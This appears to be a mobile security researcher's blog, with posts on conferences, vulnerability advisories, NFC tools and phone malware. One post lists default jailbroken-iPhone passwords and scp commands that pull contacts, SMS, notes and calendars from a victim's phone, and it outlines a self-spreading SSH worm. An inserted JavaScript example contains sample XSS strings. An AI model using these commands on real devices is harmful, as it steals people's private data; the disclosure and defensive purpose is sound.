Two stories I want to comment on:
FatSkunk software-based attestation as a solution to mobile malware. Article by the German Technology Review. They promise a lot. I don't think this will work as advertised (I haven't seen this at work - also I can't really find a paper about it).
Smartphone Weather App Builds A Mobile Botnet. So these guys created a classic trojan application (does something very simple and useful but has a malicious part too). Of course people will download the application from some trusted website - nothing to wonder about.
Just found another mobile security talk that will be held at CanSecWest: Stuff we don't want on our Phones: On mobile spyware and PUPs - Jimmy Shah, McAfee, Inc
Update March 9th: I forgot the Hack-in-the-Box conference in April in Dubai. They have two mobile security related talks: Base Jumping: Attacking GSM Base Stations and Mobile Phone Basebands by the Grugq and Open Sesame: Examining Android Code with undx2 by Marc Schoenefeld.
Just links...
Gartner Says Worldwide Mobile Phone Sales to End Users Grew 8 Per Cent in Fourth Quarter 2009; Market Remained Flat in 2009 so you know what OS/platform you want to PWN this year :-)
NeoPwn = BackTrack Mobile. NeoPwn merges with BackTrack and produces BT Mobile for the #N900; it seems that the WiFi driver for the Nokia N900 (wl1251) was patched for RFMON and injection.
Android link collection mostly OS and security stuff
...that's it!
Yeah, I will be going to CanSecWest for the first time this year. I'll have a talk on my favorite subject: Mobile Phone Security (Random tales from a mobile phone hacker). I'm really looking forward to this!
Second, there will be a mobile phone PWN2OWN again this year. They increased the cash pool for mobile devices to $60K, this looks like a statement! The devices/platforms are: iPhone (of course), BlackBerry, S60 (Nokia), Android.
SecurStar did it again: in 2006 there was RexSpy, and in 2010 we have this mobile phone crypto comparison. But the knowledgeable community is big enough to identify and point out this kind of advertising/scam fast enough.
Conferences, the only interesting talk I found is: iPhone Privacy by Nicolas Seriot at Black Hat DC this week.
In other news, I still need a Nexus One. It is still not available to buy outside of the US. *ARG*
Updated (Feb 2nd): Something from a few days ago: iPhone PKI handling flaws
I have been busy as hell from mid December to now, this was due to the Chaos Communication Congress (26C3), the fact that I turned 30, and some work stuff. I guess I have missed some interesting stuff in this time. So once again if you have interesting things on mobile security tell me!
Conferences: ShmooCon takes place in February (I always wanted to go - still haven't made it). The New World of Smartphone Security - What Your iPhone Disclosed About You by Trevor Hawthorn. Karsten is doing his GSM: srsly talk again. Bluetooth Keyboards: Who Owns Your Keystrokes? by Michael Ossmann; for some time I did a lot with Bluetooth keyboards, so I would really like to see what they show here - especially since Michael Ossmann is one of the guys who really knows about Bluetooth. honeyM: A Framework For Virtual Mobile Device Honeyclients by a whole bunch of military guys (SCNR). Blackberry Mobile Spyware - The Monkey Steals the Berries by Tyler Shields. So it really looks like ShmooCon has some mobile security content this year.
Random news:
Fun find: Abhoersicheres Handy (anti-eavesdropping mobile phone); apparently this should cost 4800 Euros. The screenshots look interesting. If anyone has any details on this device please tell me.
very short update...
SRI published an analysis of Ikee.B here: www.csl.sri.com/users/porras/iPhone-Bot.
I wrote about this stuff about a year ago here ;-)
So I was quite busy with various projects, therefore this update is really, really late.
The most interesting thing that happened recently was the jailbroken iPhone SSH fuck up. See: 1 and 2. There are many other stories on this all over the net, although by now this is kind of old. The interesting thing actually is that I investigated this jailbroken iPhone SSH problem in August of this year, including a nice statistic and some measurements. I'm planning to show this stuff together with some other work at some conference (academic and hacker) next year (talks/papers are submitted).
Conferences, I attended DeepSec in mid November, this was great fun. Including some good mobile phone security talks. At the upcoming 26C3 there will also be a bunch of talks on mobile phone security. Location tracking does scale up, GSM: SRSLY?, Playing with the GSM RF Interface, Using OpenBSC for fuzzing of GSM handsets, and SCCP hacking, attacking the SS7 & SIGTRAN applications one step further and mapping the phone system.
I actually planned to not attend 26C3 because last year kind of sucked, especially because there were way too many people. So this year I will go to some talks but not hang out at the conference. If you want to hang out during CCC give me a call or write me an email. Although my talk on SMS fuzzing was rejected, I recently was asked if I would do it if they find a spot in the schedule. Of course, I would do it.
Recent papers: iPhonePrivacy.pdf shows some privacy issue with the iPhone platform. Nothing really surprising, but a good read.
I know I missed several things in this post but I kind of have info overkill in the last weeks. Please send me hints hints hints!!!
Conferences: at PacSec 2009 Charlie Miller is giving a talk on iPhone SMS Fuzzing and Exploitation, Rich Cannings & Alex Stamos are giving a talk titled The Android Security Story: Challenges and Solutions for Secure Open Systems, and Yves Younan is giving a talk on Filter Resistant Code Injection on ARM (this sounds interesting). So PacSec seems to be filled with some good mobile security related talks.
Btw. the CanSecWest CfP is open now. I have something to submit but it will be complicated because of some academic conference. Let's see what happens.
Bug watch: Some more Palm Pre: a floating point thingy in the browser seems to make a nice DoS.
Links:
The guys from the Mobile Security Lab seem to have a lot of time recently; a couple of days ago they released a short study on SSL on mobile phones: Tricks for Defeating SSL: effectiveness test on mobile phones.
Tomorrow (7th of October) Hack-in-the-Box 2009 takes place in Malaysia. For some reason I always forget HITB; I can't remember ever reading a CFP or anything. They seem to have a few mobile security related talks. Here is the agenda. Bugs and Kisses: Spying on BlackBerry Users for Fun by Sheran Gunasekera, Side Channel Analysis on Embedded Systems by Job De Haas.
Bug watch:
Palm Pre WebOS <=1.1 Remote File Access Vulnerability The short description is: The Palm Pre WebOS <=1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Things get more and more interesting with web stuff on smartphones.
On October 9th the CFP ends for:
26C3: Here Be Dragons (26th Chaos Communication Congress)
December 27th to 30th, 2009 in Berlin, Germany
They always like mobile phone related talks, so go and submit something interesting.
Let's start with conferences again. I'll be speaking at the 5th Annual Mobile Device Management and Security Forum; this is a more high-level, non-technical conference. I haven't been to stuff like this, so it should be interesting. Another speaking event will be at the TelekomForum - Mobilfunktrends 2010 in Bonn, let's see how this goes.
Michael Mueller of silentservices.de found some nice SMS/MMS/WAP Push bugs in various smart phones. The bugs allow spoofing/obfuscating the sender address/number of MMS messages. This could be used for spam or social engineering I guess. The advisories are here and here.
The guys from the Mobile Security Lab published a primer on Service Load (SL) attacks. I haven't had time to read it yet. You can find it: here
So stuff happens in the mobile security world.
SEC-T was a nice event, I had a good time. The location was nice, the talks were good and I talked to some interesting people.
Some highlights: a reverse engineering challenge, a Wifi antenna building contest, and a bar quiz (a nerdy one). The best part, the team I was on won the quiz *G*
Bonus. I had the chance to play with a Nokia N900 (the Nokia Linux smart phone). This is a sweet device.
Vorsicht - ansteckend! (German for "Caution - contagious!") something about mobile phone malware, this was even printed *G*
Researchers discuss iPhone, SMS bug Interview done by NetworkWorld at Black Hat this year.
I rather should be doing slides but I don't want to right now.
Upcoming conferences:
#T2 in Helsinki October 29-30 will have two talks: first Forensics on GSM phones by David Batanero and second Spying via Bluetooth by Jamo Niemela. Especially the talk on phone forensics would be very interesting for me since lately the subject was brought to my attention by multiple people. David Batanero was also scheduled to talk at SEC-T in September but his talk was cancelled, too bad since I'm going to SEC-T but not #T2. As far as I can see my talk is the only mobile security talk at SEC-T this year.
DeepSec in Vienna on November 19-20 will have two mobile security talks. First Hijacking Mobile Data Connections 2.0: Automated and Improved by Roberto Piccirillo and Roberto Gassir (Mobile Security Lab) and second A practical DOS attack to the GSM network by Dieter Spaar.
Btw. I'll actually attend DeepSec this year. I'm looking forward to it since it will be my first time at DeepSec, and Vienna is a fun city.
Other interesting developments:
The various GSM cracking projects seem to be taking off this time around. The people behind AirProbe and Creating A5/1 Rainbow Tables seem to really want to build something that is easy to use. I'm really waiting for the day this stuff is done and anybody with an old GSM phone has to be worried that someone with hardware for about 100 Euros can listen to his/her phone calls and can read his/her text messages (SMS).
I recently had a fun idea; for this idea I want/need a list of hardware that has a built-in mobile phone or GSM modem. If you know of such hardware please tell me (collin[AT]mulliner.org or comment on this post). Please don't tell me about laptop/netbook X with a built-in modem but rather about your fridge or microwave that can call or text. So this is a call for hardware with embedded mobile phones!
This blog post is long overdue, but due to traveling and catching up on work this had to wait.
Black Hat USA had quite a few mobile security related talks, the slides are here: Exploratory Android Surgery by Jesse Burns (haven't read this yet), Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone by Vincenzo Iozzo and Charlie Miller. Attacking SMS by Zane Lackey and Luis Miras, Is Your Phone Pwned? Auditing, Attacking and Defending Mobile Devices (only the white paper - no slides so far) by Kevin Mahaffey and Anthony Lineberry and John Hering. The stuff for our talk Fuzzing the Phone in your Phone by Charlie Miller and myself is here.
It was nice to see that Zane and Luis took my MMS research and followed some ideas I had and made them work. Especially the part about running your own MMSC (MMS Server). At the point in time when I tested this it did not work because the WAP gateway that is configured in the MMS profile only connects to the MMSC of the mobile operator. I tested this with multiple US providers and some German providers in 2005/2006. I guess I have to do some testing here in Germany to see if anything changed for our local operators.
HAR2009 had a few interesting talks too. In no particular order: Cracking A5 GSM encryption by Karsten Nohl, Public transport SMS ticket hacking by Pavol Luptak, OpenBSC - running your own GSM network by Harald Welte (the slides are the same as the 25C3 slides), Airprobe - Monitoring GSM traffic with USRP by Harald Welte (could not find any slides, somebody took notes and put them here).
Did anything else happen in August? I think there was something but I can't remember. Hints welcome!
It looks like I'm going to speak at SEC-T in Stockholm (Sweden). I'll talk about the SMS Security Research I've done together with Charlie Miller.
I'm really looking forward to going to Stockholm since I love both Sweden and Stockholm!
Currently I'm hanging out at USENIX Security in Montreal. Talks are quite good and Montreal is a nice city to visit.
I just found out that our paper Injecting SMS Messages into Smart Phones for Security Analysis is already available for download. I also uploaded my slides for the talk. It is available on my SMS Security Research page.
I just created the SMS security research page in order to publish the slides from our (Charlie and myself) talk at Black Hat USA 2009 titled: Fuzzing the Phone in your Phone.
The injection frameworks for the iPhone, for Android, and for Windows Mobile are available for download just now. Charlie provided his Sulley fuzzing test cases. The page is far from complete as we have more tools and scripts to share. But since I'm on vacation/business trip (depending on the actual day) I didn't find time to sort it all out.
I also updated my iPhone Security page with the link to Apple's security advisory for the vulnerability we reported. iPhone OS 3.0.1 fixes this vulnerability.
SexyView, a Symbian virus/worm or bot(net)? I really don't care too much about viruses, so until this thing has a real control channel and can auto-update it is nothing. The one thing that I find interesting about it is the fact that it seems to be signed. This more or less proves that signatures don't buy you any security. One can always somehow obtain a signature for a piece of malware. This is as good as having no signatures at all - well, not exactly, it still puts the bar a little higher.
The Windows Mobile HTC OBEX path traversal bug is interesting. Not because it is new but rather that this kind of bug made it once again into a device. So I guess no quality control at HTC. Alberto, the guy who found and reported the bug, told me that HTC was not really interested in communicating with him. This is sad since HTC will also be building their own Android devices soon. I just read that HTC seems to offer a hotfix for the issue.
On a personal note. As I wrote before I'll be going to Black Hat and Defcon in Vegas. Directly after Vegas I'll travel to the Valley (Los Altos and Mountain View). Before going to Montreal for USENIX I will spend some time around Santa Barbara. So if anybody is up for some mobile phone security stuff contact me.
Otherwise see you in VEGAS!
Bernhard Mueller from SEC Consult posted this fine work on Symbian security to the full disclosure list. His white paper Pwning Symbian looks interesting (I haven't actually read it completely yet).
I guess it is time again for a news update. I actually wanted to write one for June but I somehow forgot.
Let's start with the most recent stuff. Charlie Miller partially disclosed what we are going to talk about at Black Hat at the end of the month. Sadly some reporter over-hyped his story. This sucked btw! Here are the original (over-hyped) story and the actual-facts story.
The HAR2009 program is out and there will be some mobile phone security related talks. Public transport SMS ticket hacking seems to talk about how to hack SMS-based ticketing systems. cracking a5 gsm encryption will be a state of the art talk. There will also be an OpenBSC talk that will show how to build and run a GSM network based on open source software and hardware everybody can buy. All in all HAR seems to be quite some fun. Sadly I won't be able to go due to time conflicts.
Fun find on BugTraq: Multiple Flaws in Huawei D100. The Huawei D100 is a small home 3G router (product page) that seems to be given out by some ISPs.
A personal side note: I now own/have-full-access-to a BS-11 Abis GSM base station and will soon start to play around with it. Happy happy fun fun.
I've been waiting for quite some time to publish the full details of the iPhone Safari Phone-auto-Dial vulnerability. But since Apple included it again in the just published security fixes for iPhone OS 3.0 I decided to finally go ahead and publish the details. The examples in the advisory show only the original bug; although we found some variations of it, we didn't put any examples of those in the advisory.
iPhone Safari Phone Auto-dial Vulnerability also see my iPhone page.
I'm also credited, together with many others, for reporting the issue that Mail loads remote images when displaying HTML emails. The problem is actually a little bit bigger since also iframes are loaded. I actually showed them a demo where I can start QuickTime from Mail without user interaction. Do I need to say more?
The second advisory is about the Nokia 6212 classic, a Near Field Communication (NFC) mobile phone. I did a full disclosure of the bugs at 25C3 in late December 2008 but I never published an actual advisory. I do this now.
Nokia 6212 Classic URI Spoofing and DoS vulnerabilities also see my NFC page.
First of all conferences. EUSecWest is taking place the coming week in London. It will feature multiple mobile security related presentations. First, Charlie Miller and Vincent Iozzo each have an iPhone-related talk. Second, Petr Matousek will speak about rootkits on Windows Mobile/Embedded and third, Ralf-Philipp Weinmann will talk about DECT decryption. Looks like EUSecWest will be an interesting place to be this coming week.
Right after EUSecWest, PH-Neutral is taking place in Berlin, where I will be showing off a small side project on mobile phones and web usage. Many other interesting talks will be held as usual.
Black Hat USA started to announce the speaker lineup for this year and yes, I'm one of the speakers. Together with Charlie Miller I will talk about SMS fuzzing. So far Black Hat seems to become very strong on mobile phone security this year. Jesse Burns will talk about Android; Zane Lackey and Luis Miras will also have a talk on SMS, but from the description they took a different angle than Charlie and myself. John Hering from Flexilis also seems to have gotten accepted with a mobile phone related talk that sounds very interesting: Is your phone pwned? Auditing, attacking, and defending mobile devices. Last but not least Charlie Miller and Vincent Iozzo will do an iPhone talk. I actually hope for more mobile phone related talks, let's wait and see.
The Nokia 1100 story is getting more and more annoying. In this article it is reported that this company called Ultrascan replicated the SMS interception. No technical details of course. So now I'm looking for people who are interested in the topic and who would also like to understand this and possibly replicate it.
See you at PH-Neutral this weekend!
Update: So it seems Google/HTC pushes Android security updates without publishing a change log. WTF?!? Any rumors about what this is about?
Just a quickie: the slides from BlackHat Europe have been up for a few days. Here are the slides for Hijacking Mobile Data Connections and for Passports Reloaded Goes Mobile (clone an RFID passport using an NFC mobile phone). So far Charlie Miller and Vincenzo Iozzo only put up a whitepaper of their OS X and iPhone talk.
If you can understand German (spoken word) you might want to listen to Chaosradio Express episode 120 which is about OpenBSC and generally about building GSM networks or actually the software to run a network in your cellar/garage.
In the last week there was a short buzz about an old Nokia phone (Nokia 1100) that could be reprogrammed to sniff SMS messages. The story really sounds like a hoax since the whole subscriber ID stuff is handled through the SIM card rather than through the phone itself. There are not many details, just the story. F-Secure has something in their blog about this too.
Yesterday the new Android version cupcake was released for developer phones, get your cupcake while it's still warm :-) Get it from here.
Btw the Technology Review article citing me is only in the next issue (06.2009).
BlackHat Europe brought some new stuff:
First the guys from the Mobile Security Lab showed us that the OMA provisioning functionality can be easily abused to reconfigure the Internet connection settings on many mobile phones. Although the attack requires some user interaction and therefore some social engineering the attack is quite cool. Technology Review has an article on their work. Nice Work guys!
The second mobile device related piece from BlackHat Europe is that Charlie Miller showed a workaround for the non-executable memory of the iPhone. I haven't seen the slides of his talk but NetworkWorld has an article on Charlie's iPhone find.
I was interviewed by the German version of Technology Review on the subject of smart phone security and malware. As far as I know the article citing me should be in the current issue (05.2009).
Otherwise not much happened in the world of mobile device security.
A few things happened besides Pwn2Own. One thing I missed about the mobile Pwn2Own is that Sergio Alvarez apparently tried to own a BlackBerry device but failed due to a device/software mismatch. Hey, at least he seems to have an exploitable bug for BlackBerry, nice!
Since today the slides for CanSecWest are online. The mobile security stuff is here: 1 2 3 4
At the upcoming BlackHat Europe some guys from the Mobile Security Lab will give a talk on Hijacking Mobile Data Connections. This sounds interesting, too bad I can't go.
Feedback is welcome, any good sources to recommend? Any mailing lists?
So it looks like Pwn2Own mobile failed the first time it was around. This is a surprise for me. I would have guessed that the iPhone would have been taken even with its non-exec memory, since many more people try to break it in comparison with the other mobile platforms.
Symbian was the only mobile platform somebody tried to pwn? This is a bigger surprise to me. Especially since Pwn2Own only offers a Nokia N95, a device that has non-exec memory. I tried to closely follow Pwn2Own mobile, so when I first saw that Symbian was in the game I thought this would be uninteresting since they would take a brand new device with non-exec memory. When I read about the Nokia E61 in this announcement I was really happy since this device doesn't have non-exec memory. In the latest announcement the E61 seems to have been removed. Possibly because they figured out that it was way too old, bummer.
I actually predicted that somebody would own the Windows Mobile device and the Android G1 but they all survived. Maybe all the bugs were already reported to the manufacturers before mobile Pwn2Own was announced so they could not be cashed in (I at least know about one case). So I guess people will hold on to their (mobile) bugs until next year's CanSecWest/Pwn2Own. Especially now that some well known people called for their no more free bugs campaign. One last point that I found nice was that for mobile Pwn2Own the goal was not necessarily code execution but 1) loss of information (user data) OR 2) incurring financial cost. My iPhone phone call bug would probably have counted, so I guess I should also keep bugs for myself now.
SIMKO2 is the new super secure smart phone for German government officials. According to heise.de the device is based on the HTC Touch Pro and runs a hardened version of Windows Mobile. The device and all its communication with the outside is going to be encrypted using a micro-SD smartcard (see here). Also the SIMKO2 devices seem far from being deployed since they seem to have some performance issues with the encryption, see here, although heise.de reports that the SIMKO2 devices are faster than the original Touch Pro. If you can read German you should check out these three links: 1 2 3.
Sexy View is the first signed Symbian worm (which makes it the first effective worm for S60 3rd edition). The worm spreads through simple social engineering: it sends an SMS to every contact in the contact list of an infected phone. The SMS simply contains a URL to the worm's SIS file on the internet. What I find interesting is the payload of the worm, since it doesn't seem to send any premium rate SMS or MMS but collects information about the phone (IMEI) and the SIM card (probably IMSI and MSISDN). This makes me wonder what this information is being used for, or maybe will be used for in the future. Fortinet thinks that the worm could be the first step of a mobile botnet, although there is no proof yet that the worm contains any update or remote control mechanism. This could be a really interesting thing in the near future.
The mobile bug of the week is an XSS attack against an HSDPA router using SMS, see here. Like most routers the Huawei E960 is controlled via a web interface. The interesting feature of the E960 seems to be that it displays un-escaped SMS messages in the web interface and therefore can be exploited through SMS messages containing HTML and JavaScript. The attack is really funny, although I think it is quite impractical since the victim would need to load the router configuration page in his web browser in order to trigger the attack. Nevertheless this is a great attack!
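To make the un-escaped-SMS problem concrete, here is an added example (my own illustration, not code from the original post or from the router vendor) that renders an SMS inbox into HTML the vulnerable way and the hardened way. The function names, the inbox structure and the sample messages are all constructed for this example; the point is that the fix is plain output encoding of every untrusted field (sender and body) before it is spliced into the page, plus a regression check that the rendered markup contains no active content.

```javascript
// Added example, not from the original post: SMS content rendered into a
// router's web UI without output encoding, next to the encoded version.

// Minimal HTML encoder for text nodes and attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: sender and body are spliced into the markup as-is, so
// any HTML or JavaScript inside a received SMS becomes part of the admin page.
function renderInboxUnsafe(messages) {
  return "<ul>" + messages.map(m =>
    "<li><b>" + m.from + "</b>: " + m.body + "</li>").join("") + "</ul>";
}

// Hardened pattern: every untrusted field is HTML-encoded before insertion.
// The SMS text is still shown verbatim to the user, just not interpreted.
function renderInboxSafe(messages) {
  return "<ul>" + messages.map(m =>
    "<li><b>" + escapeHtml(m.from) + "</b>: " + escapeHtml(m.body) + "</li>").join("") + "</ul>";
}

// Crude regression check for the rendered page: a raw <script tag or an
// inline on*= event handler attribute means untrusted markup got through.
function containsActiveMarkup(html) {
  return /<script\b/i.test(html) || /<[^>]+\son\w+\s*=/i.test(html);
}

// Constructed sample inbox (not real traffic): one benign message, one with
// markup in the body, one with markup in the (spoofable) sender field.
const SAMPLE_INBOX = [
  { from: "+15555550100", body: "Meeting at 10?" },
  { from: "+15555550101", body: "<script>alert(1)</script>" },
  { from: "<b onmouseover=alert(1)>spoof</b>", body: "hi" },
];

// Stand-alone demonstration of both renderers on the sample inbox.
function demo() {
  const unsafe = renderInboxUnsafe(SAMPLE_INBOX);
  const safe = renderInboxSafe(SAMPLE_INBOX);
  return {
    unsafeHasActiveMarkup: containsActiveMarkup(unsafe),  // true
    safeHasActiveMarkup: containsActiveMarkup(safe),      // false
    safeHtml: safe,
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Note that the sender field is encoded too: the advisories linked elsewhere in this blog show that MMS/SMS sender addresses can be spoofed, so the originator is as untrusted as the body. A Content-Security-Policy header on the admin interface would be a second layer, but it does not replace encoding at the point of output.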
This year's CanSecWest will have a good amount of smart phone security related talks besides the earlier announced mobile pwn2own contest. Talks seem to be focused on the iPhone and the Android platform. 1) Alfredo Ortega and Nico Economou - Multiplatform Iphone/Android Shellcode, and other smart phone insecurities 2) Jon Oberheide - A Look at a Modern Mobile Security Model: Google's Android and 3) Sergio 'shadown' Alvarez - The Smart-Phones Nightmare. I suppose Sergio Alvarez is also going to talk about the iPhone since Apple fixed multiple bugs that he submitted in the iPhone 2.2 update. I'm a bit sad that I can't attend CanSecWest.
At BlackHat Europe Jeroen van Beek will show his NFC-phone-based e-Passport cloning tools. Maybe there is even more mobile security stuff going on there since the speaker list is not yet complete.
Done with conferences for this post. The guys from the Mobile Security Lab just launched their PoC site where people can test their phones using exploits developed by the Mobile Security Lab. Nice idea!
Last weekend at ShmooCon Charlie Miller released details on a vulnerability in Android's audio player. Some links: 1 2
Related news: Palm has finally killed PalmOS. I really waited a long time for this to happen. PalmOS was just way past its time. This is a good and sad thing, but now it's over.
Did I miss anything?
I just read that CanSecWest's Pwn2Own is going mobile this year. It looks like they are going to have an iPhone, an Android (should be a G1), a Symbian, and a Windows Mobile device to pwn and own. I wonder how the rules are going to be for these devices. via twitter
Second part. There seems to be the first mobile phone-banking/micro-payment trojan out in the wild according to Kaspersky Labs. The trojan targets a micro-payment service that allows transfer of money and minutes between users of the service using SMS. Another interesting part of the story is that the trojan is just a modified version of an existing premium SMS trojan. Stories: 1 2.
I've just uploaded the latest version of my NFC/NDEF tools. This is the version that I presented at my talk at 25C3. I mainly added some parsers for the new NDEF records supported by the Nokia 6212 Classic. Also included are some bug fixes and a small fix to talk to the BtNfcAdapter running on the Nokia 6212. I further included some more attack samples and an updated version of my ndef_mifare reader/writer tool.
At 25C3 I had the chance to take a look at Motorola's L7 NFC phone that is used by Deutsche Bahn Touch and Travel. The phone is not a real NFC phone, Motorola just replaced the battery lid with a lid that also contains the NFC hardware (or maybe only the antenna). The only NFC functionality the phone supports is the Touch and Travel application. What is really bad is that the user first needs to start the application and then hold the phone up to the Touch Point. WTF? How is this going to be a good user experience? The Nokia phones constantly scan for NFC tags and start the appropriate application as soon as one holds the phone up to a tag.
Finally I have noticed that RMV ConTags are starting to appear all over the place outside Frankfurt/Main. Although they only seem to be placed at big stations like the Darmstadt main station (Hauptbahnhof) but not inside the city. As always I like to know about interesting new NFC services around Europe and especially Germany.
Here is another nice Windows Mobile (HTC) security bug that is related to WAP Push. The vulnerability can be triggered by sending vCards to port 9204/UDP over either WiFi or GPRS/UMTS. The effect seems to be significant device slow down and/or device freezing that requires battery removal. This again reminds me of my good old MMS Notification DoS attack.
The bug was discovered by the Mobile Security Lab (whoever this is). I hope we will see more interesting discoveries from them, they just seem to have set up their site in October.
First, I know I'm not the first one to write/warn about this so don't flame me for it.
I recently jailbroke my iPhone so I could take a closer look at the iPhone and its OS. Like most people I just used the PwnageTool from the iPhone Dev-Team. It is easy, fast and just works. What most people forget is that the jailbroken iPhone OS comes with an ssh server and that the root and mobile users have their password set to alpine (the mobile password is dottie). This basically means that everybody can log into every jailbroken iPhone as user root. When I jailbroke my iPhone I didn't change my password right away since I was too busy playing with the new features, and I strongly believe that many other people never changed the password of their jailbroken iPhone.
Again the danger lies in public Wifi hotspots or any other situation where you share Wifi with people you don't know. A good example is the upcoming Chaos Communication Congress which has one of the most hostile (wireless) networks I know.
So what can happen if you leave your iPhone's password unchanged? That is what I cooked up the last few nights.
The Basics: In further detail this means all your private data is gone, just like this:
- Anyone can log into your iPhone as user root and/or mobile
- Anyone can copy files to and from your iPhone using scp
SSH_PARAMS="-q -o NumberOfPasswordPrompts=1 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
scp $SSH_PARAMS root@$IP:/var/mobile/Library/AddressBook/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/SMS/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Notes/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Calendar/* /tmp/yourdata/
The code shown above simply copies your Addressbook, SMS, Notes, and Calendar from your iPhone using scp (secure copy - part of ssh). I know there is much more to steal like: photos, email, or VPN configuration. This attack is so simple everybody can do it without any special knowledge or tools.
Getting your personal data stolen can happen to you anywhere but there is another threat that is more likely at events like the Chaos Communication Congress, defcon, and any other conference with a high number of jailbroken iPhones: a worm.
A worm that simply spreads using ssh/scp and the default root/mobile password can be written in bash (which is installed on all jailbroken iPhones) in about 4 hours. The worm just (tries to) copies itself (a bash script) to every host on the local wifi network in the background. Background tasks can be easily setup using launchd. Just add a new task that runs the worm shell script every couple of minutes. This is no big deal for anyone with just basic understanding of ssh,scp,bash, and launchd/launchctl. I was able to do this in an evening mainly using Google to get the appropriate launchd plist syntax.
Don't get me wrong, I don't want to encourage anyone to do all this. I just show you how damn easy this is. So please change your root/mobile password on your jailbroken iPhone - or somebody else will do it for you.
Btw. if you are looking for the images that the iPhone takes of anything you do, some of these are located here: /var/mobile/Library/Caches/Snapshots (of course this is not new either, see here).
Today I submitted the camera-ready version of my paper Vulnerability Analysis and Attacks on NFC-enabled Mobile Phones to the Workshop on Sensor Security at ARES 2009. Finally an academic publication again. Having done this, I'm now officially on Christmas vacation until 25C3.
Today we published a small security bug present in the iPhone OS until version 2.1. The bug is small but has big impact in the way that it can be used to call arbitrary phone numbers from visiting a website.
More details including a video (but not full-disclosure) can be found here (German only): www.sit.fraunhofer.de/pressedownloads/pressemitteilungen/iPhoneHack.jsp
We will do a full-disclosure as soon as the update is out and people had time to install it. Details will be available here.
NIST just released their Guidelines on Cell Phone and PDA Security; here are some comments from my side.
Overall I think the document is quite good, covering the field well. My main point of criticism is the way they present their references. The document cites many news sites instead of the original publisher's site/document. Therefore some of the references are more or less useless since they don't provide the path to more detailed information. I write this not only because they quote The Register on my MMS vulnerability but also because they quote ZDNet on various other vulnerabilities rather than the original advisories. To make it clear: I don't think the articles by these news sites are bad or wrong, I just think people reading NIST publications expect a little more detail.
This post in the XDA-Developers forum shows that Windows Mobile 6 on HTC devices is vulnerable to malicious WAP Push SI (Service Indication) and SL (Service Load) messages. An attacker can send a message containing a URL to an executable; the executable will be automatically downloaded and executed WITHOUT any user interaction. The problem is that HTC disabled the security settings for these kinds of WAP Push messages; normally a device should only accept these kinds of messages from trusted originators (e.g. your service provider - I don't know if I want this either).
The fix to this problem is very easy as it just requires modification of a few keys in the mobile phone's registry (yes, Windows Mobile has a registry). The steps for this modification are described in the original advisory.
The bug is kind of similar to one of the MMS-based bugs I discovered 2 years ago where the Windows Mobile devices would accept WAPPush messages over UDP (WiFi).
This WAP Push auto-execute configuration bug is really bad since it would allow anybody to write a very simple worm that only needs to send WAP Push messages (SMSs) to spread. The victim device then downloads and executes the worm binary from the Internet.
They even made a demo video, although you don't see too much.
Some open questions from my side:
- Is it really only HTC devices?
- Is it only Windows Mobile 6?
- Does this work via WiFi (like my notiflood tool)?
Silentservices.de (author's website)
The Advisory
Here are my slides for my BlackHat Japan talk Exploiting Symbian. This work was done as part of my research at Fraunhofer SIT. If you have any questions please contact me through my website at Fraunhofer SIT.
I just set up pptpd for my iPhone, since I don't really trust all the application developers to think about my passwords and my privacy.
I know PPTP is not the best VPN solution but it works and was easy to setup.
@Joe do you want one too?
Alex recently got a Mifare (RFID) ID spoofing device. Last weekend at the MRMCD111b we got to play with it. I'm looking forward to trying it against some real targets.
So it looks like I'm going to BlackHat Japan in October to talk about my latest project, SymbianOS Exploitation. I'm really looking forward to it since I have never been to Japan or BlackHat before.
BlackHat Japan speakers page
I finally came to post the official advisory Nokia 6131 NFC URI Spoofing and DoS Advisory to the usual mailing lists in order for this thing to get into the vulnerability archives.
Here are my NFC security tools, this time for your Nokia 6131 NFC. The tool set consists of: BtNfcAdapter (a simple NDEF reader/writer that is controllable via Bluetooth - basically turns your 6131 NFC into a lightweight tag reader/writer), BtNfcAdapterRaw (Mifare Classic raw reading version of BtNfcAdapter), and MfStt (the Mifare Sector Trailer tool, a very basic tag security checker).
All the tools are for educational purposes only! They are not stable! Especially take care when using the writing features of MfStt.
Feedback is welcome as always. I also accept dumps of cool NFC tags (only including a picture of that very tag).
I just uploaded the first version of my Python NDEF library. The library supports all types standardized by the NFC Forum to date. I also implemented support for Nokia's Bluetooth Imaging tag and added a parser for the RMV ConTag.
I also uploaded some tag samples (dumps of the tag data). The dumps also include the Mifare sector trailers (if this is of interest for you).
Feedback is very welcome!
Here are the slides for my talk Attacking NFC Mobile Phones that I gave at EUSecWest 2008. The tools, libraries, examples and data dumps will be uploaded soon.
Looks like I've been selected to give a talk at EUSecWest this year. The subject will be the security of NFC (Near Field Communication) mobile phones.
My friend Alech also seems to have a talk there. This should be some fun.
Another bug I found in the software of the NAS-4220-B is that you can use telnet to log in to the NAS-4220-B as root without being asked for a password. This is possible right after boot of the device. The problem seems to originate from the fact that the software puts together the filesystem in RAM during boot. The actual bug is that telnetd is started before /etc/passwd is populated with a root account that has a password set.
[1] raidsonic nas4220 disk crypt key leak
Found while playing with my NAS-4220-B last Sunday. RaidSonic didn't answer my emails so here you go.
--- BEGIN ADVISORY ---
Manufacturer: RaidSonic (www.raidsonic.de)
Device: NAS-4220-B
Firmware: 2.6.0-n (2007-10-11)
Device Type: end user grade NAS box
OS: Linux 2.6.15
Architecture: ARM
Designed by: Storm Semiconductor Inc (www.storlinksemi.com)
Problem: Hard disk encryption key stored in plain on unencrypted partition.

Time line:
Found: 09. March 2008
Reported: 09. March 2008
Disclosed: 16. March 2008

Summary:
The NAS-4220-B offers disk encryption through its web interface. The key used for encrypting the disk(s) is stored on an unencrypted partition. Therefore one can extract the encryption key by removing the disk from the NAS and reading the value from the unencrypted partition. The key itself is stored in a file in plain (base64 encoded). Therefore the NAS-4220 crypt disk support can not be considered secure.

Details:
